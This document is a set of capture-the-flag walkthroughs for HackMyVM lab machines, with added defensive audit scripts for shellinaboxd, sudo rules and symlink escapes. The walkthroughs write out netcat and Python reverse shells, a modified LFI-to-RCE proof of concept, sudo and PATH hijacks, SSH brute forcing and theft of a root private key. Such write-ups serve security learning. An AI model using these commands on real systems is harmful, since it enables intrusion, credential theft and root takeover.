HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: qdPM | Login
3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
...
```

Opening port 80 in a web browser shows a qdPM v9.2 login panel. A quick search shows that this version leaks its database credentials.

```text
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
```

Download databases.yml to get the database username and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"
```


Log in to MySQL on port 3306 and find a table of URLs.

```bash
# -P selects the port; a lowercase -p is the password option
~ mysql -h 192.168.56.100 -P 3306 -u qpmadmin -p
...
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.001 sec)
```

And a users table.

```bash
MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.001 sec)
```

Build a wordlist from the URLs and enumerate vhosts. All of them answer 200, but party.bah.hmv returns the smallest page.

```bash
~ gobuster vhost -u bah.hmv -w dic
===============================================================
2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
===============================================================
Found: party.bah.hmv (Status: 200) [Size: 5216]
Found: imagine.bah.hmv (Status: 200) [Size: 5659]
Found: portal.bah.hmv (Status: 200) [Size: 5657]
Found: hackme.bah.hmv (Status: 200) [Size: 5657]
Found: telnet.bah.hmv (Status: 200) [Size: 5657]
Found: dev.bah.hmv (Status: 200) [Size: 5651]
Found: ssh.bah.hmv (Status: 200) [Size: 5651]
Found: here.bah.hmv (Status: 200) [Size: 5653]
Found: ass.bah.hmv (Status: 200) [Size: 5651]
Found: console.bah.hmv (Status: 200) [Size: 5659]
Found: tmux.bah.hmv (Status: 200) [Size: 5653]
Found: dark.bah.hmv (Status: 200) [Size: 5653]
Found: terminal.bah.hmv (Status: 200) [Size: 5661]
```

Add party.bah.hmv to /etc/hosts and visit port 80 again: it serves a browser-based shell interface. Log in with the credentials from the yml file.


This web shell is good enough, so there is no need to spawn a reverse shell.

In /home there is another user, rocio. Switch to rocio with the password from the database.

```bash
qpmadmin@bah:/home/rocio$ su rocio
Password:
rocio@bah:~$ id
uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Run pspy. Notice an interesting shellinaboxd command line.

```bash
2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev
```

From the shellinabox documentation on GitHub, a `-s` service has the form `<url-path>:<user>:<group>:<cwd>:<command>`, so `/devel:root:root:/:/tmp/dev` means that visiting http://xxxx/devel runs /tmp/dev as root, with / as the working directory and no login prompt.
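As an added example (not from the original write-up), the following Python audit parses a shellinaboxd command line like the one pspy printed and flags service definitions that run as root or execute a command from a world-writable directory; the WRITABLE_DIRS set is an assumed stand-in for a real permission check, and the sample command line is reconstructed from the pspy output with the --user-css option left out.

```python
"""Audit shellinaboxd service definitions for privileged or hijackable commands."""
import shlex

# Constructed stand-in for directories an unprivileged user can write to; a
# real audit would os.stat() the command's parent directory instead.
WRITABLE_DIRS = {"/tmp", "/var/tmp", "/dev/shm"}

# The command line pspy captured on the box, reconstructed here without the
# --user-css option (its unquoted spaces would confuse a shell-style split).
PSPY_CMDLINE = (
    "/usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid "
    "-c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox "
    "--no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev"
)


def parse_services(cmdline):
    """Return every service spec ("url:user:group:cwd:cmd") given via -s or --service."""
    argv = shlex.split(cmdline)
    services = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-s", "--service"):          # value in the next argument
            services.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--service="):        # --service=SPEC
            services.append(arg[len("--service="):])
        elif arg.startswith("-s") and len(arg) > 2:   # -sSPEC, as in "-s/:LOGIN"
            services.append(arg[2:])
        i += 1
    return services


def audit_service(spec):
    """Return a list of findings for one service spec; empty means nothing to flag."""
    findings = []
    if spec.endswith(":LOGIN"):
        return findings  # "/:LOGIN" hands the session to /bin/login, which authenticates
    parts = spec.split(":", 4)
    if len(parts) != 5:
        return [f"malformed service spec: {spec}"]
    url, user, group, cwd, cmd = parts
    if user in ("root", "0") or group in ("root", "0"):
        findings.append(f"{url} runs {cmd} as {user}:{group} without authentication")
    exe = cmd.split()[0] if cmd.split() else cmd
    parent = exe.rsplit("/", 1)[0] or "/"
    if parent in WRITABLE_DIRS:
        findings.append(f"{url} executes {exe} from world-writable {parent}")
    return findings


def audit_cmdline(cmdline):
    """Audit every service on a shellinaboxd command line."""
    findings = []
    for spec in parse_services(cmdline):
        findings.extend(audit_service(spec))
    return findings


if __name__ == "__main__":
    for finding in audit_cmdline(PSPY_CMDLINE):
        print("[!]", finding)
```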

So we write a reverse shell command into /tmp/dev.

```bash
~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
~ chmod +x /tmp/dev
```

Visiting http://party.bah.hmv/devel/ in the browser triggers the reverse shell.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59154.
id
uid=0(root) gid=0(root) groups=0(root)
```

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan directories.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]
```


After checking all of these files, nothing is interesting. Next, fuzz index.php for a parameter name.

```bash
~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000013357:   200        31 L     43 W       1508 Ch     "page"
```

Fuzz for local files, but nothing useful turns up.

```bash
~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ' --hh 25 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
...
```

Now we have a PHP file with an LFI and a phpinfo page that shows file_uploads is On. This is the well-known LFI + phpinfo() temporary-file race.

Download the PoC from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify the payload.

```python
PAYLOAD = """%s\r
<?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG
```

Run the PoC; the shell is now written to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...
```


Listen on port 1234 and include /tmp/g through the LFI.

```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49970.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Next, we find user chris and a file named magic that www-data may run through sudo.

```bash
www-data@bunny:/home/chris/lab$ sudo -l
sudo -l
Matching Defaults entries for www-data on bunny:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on bunny:
    (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
www-data@bunny:/home/chris/lab$ cat magic
cat magic
#/bin/bash
$1 $2 $3 -T -TT 'sh #'
www-data@bunny:/home/chris/lab$
```

Checking GTFOBins (https://gtfobins.github.io/gtfobins/zip/), zip can spawn a shell with exactly the arguments the magic script appends.

Shell

It can be used to break out from restricted environments by spawning an interactive system shell.

```bash
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
```

Escalate to user chris.

```bash
www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
  adding: etc/hosts (deflated 30%)
$ id
id
uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
```

Create /home/chris/.ssh, upload our id_rsa.pub as authorized_keys, chmod 600 it, and we can log in over SSH.

Look for writable files.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...
```


Find /opt/pendu.py, which imports the random module.

```bash
chris@bunny:~$ cd /opt
chris@bunny:/opt$ ls -la
total 12
drwxr-x---  2 root chris 4096 juil. 31 10:25 .
drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
-rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
chris@bunny:/opt$ cat pendu.py
import random
...
```

Use pspy to watch processes: root runs pendu.py periodically.

```bash
2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py
```

Write a Python reverse shell into random.py and wait for the cron job to hand us a root shell.

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groupes=0(root)
bunny
root@bunny:~#
```

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

```bash
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
|   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
|_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
80/tcp open  http    nginx 1.14.2
| http-robots.txt: 9 disallowed entries
| /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
|_/zp-data/ /page/search/ /uploaded/ /backup/
|_http-server-header: nginx/1.14.2
|_http-title: Galer\xC3\xADa
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

From the main page, get the application name and version.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->
```


Searching for Zenphoto 1.5.7 shows it has an authenticated file upload vulnerability:

```text
Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code

Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/
```


In robots.txt there is a strange entry: P@ssw0rd.

The Zenphoto login panel is at /zp-core/admin.php; log in with admin:P@ssw0rd.

Upload a PHP reverse shell, request it, and catch the connection.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38120.
Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
 20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ curl http://192.168.56.99/backup/r.php
```

There are three users in /home.

```bash
www-data@zen:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster
```

Since there is no obvious way to escalate to any of these three users, we brute-force SSH, using the usernames as both the login and password list.

```bash
~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F
...
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster
```

Log in as zenmaster and escalate to kodo.

```bash
zenmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p
```


As user kodo, check sudo -l: /usr/bin/see may be run as hua. Use its edit action, type :!/bin/bash inside the editor, and we escalate to user hua.

```bash
kodo@zen:/home/zenmaster$ sudo -l
Matching Defaults entries for kodo on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kodo may run the following commands on zen:
    (hua) NOPASSWD: /usr/bin/see
kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
hua@zen:/home/zenmaster$ id
uid=1002(hua) gid=1002(hua) groups=1002(hua)
```

As hua, check sudo -l again.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
```
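As an added example (not from the original write-ups), this Python script parses the sudo -l output quoted in the Bunny and Zen sections and flags the rule patterns those boxes were solved with: a trailing * argument, a shell or interpreter as the permitted command, a binary with a known editor or shell escape, and NOPASSWD rules that run as root. The SHELLS and ESCAPE_CAPABLE sets are illustrative assumptions, not complete lists.

```python
"""Audit sudo -l output for rules that are easy to abuse."""
import re

# Illustrative lists (assumed): interpreters that are a shell as the target
# user, and binaries that can drop to a shell from inside (see GTFOBins).
SHELLS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
ESCAPE_CAPABLE = {"see", "vim", "vi", "less", "more", "zip"}

# A privilege line as printed by "sudo -l", e.g.
#   (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# The privilege lines quoted in the write-ups, used as sample input.
SAMPLE_SUDO_L = """\
User www-data may run the following commands on bunny:
    (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
User zenmaster may run the following commands on zen:
    (kodo) NOPASSWD: /bin/bash
User kodo may run the following commands on zen:
    (hua) NOPASSWD: /usr/bin/see
User hua may run the following commands on zen:
    (ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
"""


def parse_rules(text):
    """Yield (runas, tags, argv) for each privilege line in sudo -l output."""
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers, Defaults and option lines do not start with "("
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        yield m.group("runas").strip(), tags, m.group("cmd").split()


def audit_rule(runas, tags, argv):
    """Return the list of weaknesses found in one rule (empty if none)."""
    findings = []
    exe = argv[0]
    base = exe.rsplit("/", 1)[-1]
    command = " ".join(argv)
    # A bare wildcard lets the invoking user append any arguments (Bunny's magic script).
    if "*" in argv[1:]:
        findings.append(f"wildcard argument in '{command}'")
    # A shell or interpreter as the command is simply a shell as the target user.
    if base in SHELLS:
        findings.append(f"{exe} runs as {runas}: interpreter/shell")
    if base in ESCAPE_CAPABLE:
        findings.append(f"{exe} runs as {runas}: known shell escape")
    if "NOPASSWD" in tags and findings:
        findings.append("NOPASSWD: no password needed to abuse the above")
    # Anything run as root without a password deserves a look at how it resolves helpers.
    if runas.split(":")[0].strip() in ("ALL", "root") and "NOPASSWD" in tags:
        findings.append(f"{exe} runs as root without a password; audit its PATH and helper use")
    return findings


def audit_sudo_l(text):
    """Map each rule's command string to its findings, for every rule in the output."""
    return {" ".join(argv): audit_rule(r, t, argv) for r, t, argv in parse_rules(text)}


if __name__ == "__main__":
    for command, findings in audit_sudo_l(SAMPLE_SUDO_L).items():
        print(command, "->", findings or "ok")
```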


We can write to /usr/local/bin.

```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null
...
/tmp/.X11-unix
/usr/local/bin
/usr/lib/systemd/system/mountnfs-bootclean.service
...
```

Use strace on add-shell: it looks up awk, cat and rm through PATH, starting with /usr/local/bin, where none of them exist.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory
```


So we place a reverse shell at /usr/local/bin/awk and get a root shell.

```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
hua@zen:/tmp$ chmod +x /usr/local/bin/awk
hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38124.
id;hostname
uid=0(root) gid=0(root) groups=0(root)
zen
```

HackMyVm Chronos Walkthrough

The author's writeup is here: https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author uses perl to get a reverse shell, because the machine filters many keywords: nc, bash, python, etc.

My way is to use wget to download a PHP reverse shell.

```bash
~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'
Something went wrong

~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
Sun Aug  8 04:05:06 UTC 2021
total 24
drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
-rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
-rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php
```

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

```bash
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for secret.vinci.hmv (192.168.56.100)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
|   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Check the HTTP service on port 65530.

```bash
~ curl http://192.168.56.100:65530
404 page not found
```

Try /index.

```bash
~ curl http://192.168.56.100:65530/index
Hi, You are close!
```

Scan directories. Because there are too many false-positive responses, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]
```


Notice the last entry, /nt4share. Check it.

```bash
~ curl http://192.168.56.100:65530/nt4share/
<pre>
<a href=".Xauthority">.Xauthority</a>
<a href=".bash_history">.bash_history</a>
<a href=".bash_logout">.bash_logout</a>
<a href=".bashrc">.bashrc</a>
<a href=".profile">.profile</a>
<a href=".ssh/">.ssh/</a>
<a href="linpeas.sh">linpeas.sh</a>
<a href="pspy64">pspy64</a>
</pre>
```

It is a user's home directory served as a file listing. From .bash_history we get a username, adela.

```bash
~ curl http://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null
...
```

From .ssh/ we download id_rsa and log in over SSH as adela.

```bash
~ chmod 600 id_rsa
~ ssh adela@192.168.56.100 -i id_rsa
...
adela@noob:~$ id
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

The last step is tricky. After a lot of enumeration there is still no obvious path to root.

Create a symbolic link to /root/.ssh/id_rsa inside the home directory, then read it through the HTTP server, which follows the link when serving /nt4share/.

```bash
adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
...
~ curl http://192.168.56.100:65530/nt4share/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
...
ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
-----END OPENSSH PRIVATE KEY-----
```
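The root step works because the file server resolves the planted symlink and reads the target as a privileged process. As an added example (not from the original write-up or the Go server on the box), the Python check below is what such a server should do before opening anything: resolve the requested path, symlinks included, and refuse it unless the real file still lies inside the served directory; it also rejects ../ traversal. build_demo_share constructs a sample layout mirroring the box so the check can be exercised; names in it are assumptions.

```python
"""Reject symlink and traversal escapes when serving a directory over HTTP."""
import os
import tempfile


class PathEscape(Exception):
    """Raised when a request would read outside the served directory."""


def resolve_under_root(root, requested):
    """Return the real filesystem path for requested, or raise PathEscape.

    root:      directory being served (the adela home directory on Noob)
    requested: URL path relative to the share, e.g. "id_rsa" or ".ssh/id_rsa"
    """
    real_root = os.path.realpath(root)
    # Strip any leading slash so os.path.join cannot produce an absolute path.
    candidate = os.path.join(real_root, requested.lstrip("/"))
    real = os.path.realpath(candidate)  # follows every symlink component and ../
    if real != real_root and not real.startswith(real_root + os.sep):
        raise PathEscape(f"{requested!r} resolves to {real}, outside {real_root}")
    return real


def safe_read(root, requested):
    """Read a file from the share only if it resolves inside the share."""
    with open(resolve_under_root(root, requested), "rb") as f:
        return f.read()


def build_demo_share(base=None):
    """Constructed sample: a 'root' home with a key and a served share that links to it."""
    base = base or tempfile.mkdtemp(prefix="noob-")
    secret_dir = os.path.join(base, "root", ".ssh")
    share = os.path.join(base, "home", "adela")
    os.makedirs(secret_dir)
    os.makedirs(os.path.join(share, ".ssh"))
    secret = os.path.join(secret_dir, "id_rsa")
    with open(secret, "w") as f:
        f.write("-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED-SAMPLE\n")
    with open(os.path.join(share, ".bash_history"), "w") as f:
        f.write("ls -la /opt\n")
    os.symlink(secret, os.path.join(share, "id_rsa"))  # the "ln -s" from the box
    return {"share": share, "secret": secret}


if __name__ == "__main__":
    layout = build_demo_share()
    print(safe_read(layout["share"], ".bash_history").decode(), end="")
    for probe in ("id_rsa", "../../root/.ssh/id_rsa"):
        try:
            safe_read(layout["share"], probe)
        except PathEscape as e:
            print("blocked:", e)
```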

HackMyVm Hundred Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

```bash
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
